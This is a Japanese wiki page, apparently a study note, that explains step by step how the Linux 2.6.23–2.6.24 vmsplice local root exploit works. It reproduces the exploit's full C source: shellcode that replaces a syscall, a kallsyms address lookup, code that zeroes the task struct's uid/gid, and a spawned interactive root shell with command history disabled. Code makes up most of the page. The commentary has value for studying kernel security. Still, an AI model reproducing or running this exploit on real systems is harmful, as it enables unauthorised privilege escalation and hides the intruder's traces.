無料Wikiサービス | デモページ
検索

アクセス数
最近のコメント
kprobe - ななし
ksetの実装 - スーパーコピー
カーネルスレッドとは - ノース
カーネルスレッドとは - nbyst
asmlinkageってなに? - ノース
asmlinkageってなに? - よろしく
はじめ - ノース
はじめ - ノース
はじめ - 楽打連動ユーザー
はじめ - 楽打連動ユーザー
Adsense
広告情報が設定されていません。

vmsplice Local Root Exploit


Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploitのコードについてです。
vmspliceでシステムコールsys_vm86oldの物理メモリに、exploitを埋め込み、sys_vm86oldシステムコール番号で呼び出すことで、task構造体のuid等を直接書き換えることでroot権限を取得するというものです。

trampoline[]は、TARGET_PATTERNシステムコールと差し換わるコードです。このtrampolineシステムコールの引数は、31337, kernel_code, 1, 2, 3, 4となり、意味があるのは、31337, kernel_codeで、31337はマジック番号で、kernel_codeがジャンプ先アドレスです。
#define TARGET_PATTERN      " sys_vm86old"
#define TARGET_SYSCALL      113
 
#ifndef __NR_vmsplice
#define __NR_vmsplice       316
#endif
 
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#define gimmeroot()     syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)

#define TRAMP_CODE      (void *) trampoline 
#define TRAMP_SIZE      ( sizeof(trampoline) - 1 )
スタック上には、0x4(%esp)から上位に向かって、retアドレス,4,3,2,1,kernel_code,31337とpushされています。0x4(%esp)が31337でないならエラーで復帰します。これは他のプロセスがsys_vm86oldをコールしたケースで、この処理がないとカーネルはパニックに陥ります。OKなら、0x8(%esp)のkernel_codeをcallします。
unsigned char trampoline[] =
"\x8b\x5c\x24\x04"      /* mov    0x4(%esp),%ebx    */
"\x8b\x4c\x24\x08"      /* mov    0x8(%esp),%ecx    */
"\x81\xfb\x69\x7a\x00\x00"  /* cmp    $31337,%ebx       */
"\x75\x02"          /* jne    +2            */
"\xff\xd1"          /* call   *%ecx         */
"\xb8\xea\xff\xff\xff"      /* mov    $-EINVAL,%eax     */
"\xc3"              /* ret              */
;

void    die(char *msg, int err)
{
   printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
   fflush(stdout);
   fflush(stderr);
   exit(1);
}
get_target()で/proc/kallsymsからTARGET_PATTERNのsys_vm86oldシステムコールのアドレスを取得します。なお、ここで指定するシステムコールはsys_vm86oldに限定されるものでなく、任意のシステムコールを選択できます。たぶんメジャーでないという事で、sys_vm86oldが使われていると思います。
long    get_target()
{
   FILE    *f;
   long    addr = 0;
   char    line[128];

   f = fopen("/proc/kallsyms", "r");
   if (!f) die("/proc/kallsyms", errno);

   while (fgets(line, sizeof(line), f)) {
       if (strstr(line, TARGET_PATTERN)) {
           addr = strtoul(line, NULL, 16);
           break;
       }
   }

   fclose(f);
   return addr;
}
get_current()でタスク構造体を取得します。 タスク構造体は各プロセスのカーネルスタック領域に有していて、この実装はcurrentマクロに準じます。
static inline __attribute__((always_inline))
void *  get_current()
{
   unsigned long curr;
   __asm__ __volatile__ (
   "movl %%esp, %%eax ;"
   "andl %1, %%eax ;"
   "movl (%%eax), %0"
   : "=r" (curr)
   : "i" (~8191)
   );
   return (void *) curr;
}
kernel_code()でtask構造体のudiに0を設定することで、root権限を取得します。 real UID/saved UID/effective UID/vfs UID/real GID/saved GID/effective GID/vfs GIDの順にtask構造体メンバとして配置しているため、task構造体内をずらしながら、全走査することで、そのようなパターンのメモリ配置を検索して、uidの設定する位置を検索します。この泥臭し実装は、対応できるバージョンないしアーキテクチャに幅を持たせるためのことかと思います。

そのパターンがあれば、p[0] = p[1] = p[2] = p[3] = 0;/p[4] = p[5] = p[6] = p[7] = 0;で、rootとします。
void    kernel_code()
{
   int i;
   uint    *p = get_current();

   for (i = 0; i < 1024-13; i++) {
       if (p[0] == uid && p[1] == uid &&
           p[2] == uid && p[3] == uid &&
           p[4] == gid && p[5] == gid &&
           p[6] == gid && p[7] == gid) {
           p[0] = p[1] = p[2] = p[3] = 0;
           p[4] = p[5] = p[6] = p[7] = 0;
           p = (uint *) ((char *)(p + 8) + sizeof(void *));
           p[0] = p[1] = p[2] = ~0;
           break;
       }
       p++;
   }   
}
setresuid()でreal UID/saved UID/effective UIDを、 setresgid()でreal GID/saved GID/effective GIDを、カレントuid/gidに設定します。これはkernel_code()でtask構造体内のuid/gidの設定位置を取得するためのマークとするためです。

get_target()でexploitを埋め込みアドレスを所得し、struct iovec iovに設定し、pipeにexploitとしてtrampoline[]を書き込み、vmsplice()をコールします。これでtrampoline[]の内容が、get_target()でのシステムコールのコードと差し換わりました。

gimmeroot()は差し換わったシステムコールをコールします。これでroot権限が取得できました。でexecl()でshellを起動するとroot権限のコマンドラインで何でもできるということです。
static uint uid, gid;

int main(int argc, char *argv[])
{
   int     pi[2];
   long        addr;
   struct iovec    iov;

   uid = getuid();
   gid = getgid();
   setresuid(uid, uid, uid);
   setresgid(gid, gid, gid);
 
   if (!uid || !gid)
       die("!@#$", 0);

   addr = get_target();
   printf("[+] addr: 0x%lx\n", addr);

   if (pipe(pi) < 0)
       die("pipe", errno);

   iov.iov_base = (void *) addr;
   iov.iov_len  = TRAMP_SIZE;

   write(pi[1], TRAMP_CODE, TRAMP_SIZE);
   _vmsplice(pi[0], &iov, 1, 0);

   gimmeroot();

   if (getuid() != 0)
       die("wtf", 0);

   printf("[+] root\n");
   putenv("HISTFILE=/dev/null");
   execl("/bin/bash", "bash", "-i", NULL);
   die("/bin/bash", errno);
   return 0;
}

補足

Linux Kernel 2.6.23 - 2.6.24となっているように、linux3.3.8では動作しません。linux3.3.8は、real UID/saved UID/effective UID/real GID/saved GID/effective GIDが、task構造体に直接埋め込まれておらず、struct credを介してreal UID/saved UID/effective UID/real GID/saved GID/effective GIDが設定されるようになっています。

また、vmspliceで、 get_iovec_page_array()でstruct iovecのpageを取得するのですが、その時access_ok(VERIFY_READ, base, len)で、そのアドレスが有効なユーザスペースのアドレス空間かどうかチェックするようになっていて、上記のケースだとvmspliceはエラーとなってしまうからです。

最終更新 2014/04/13 00:30:39 - north
(2014/04/12 17:20:32 作成)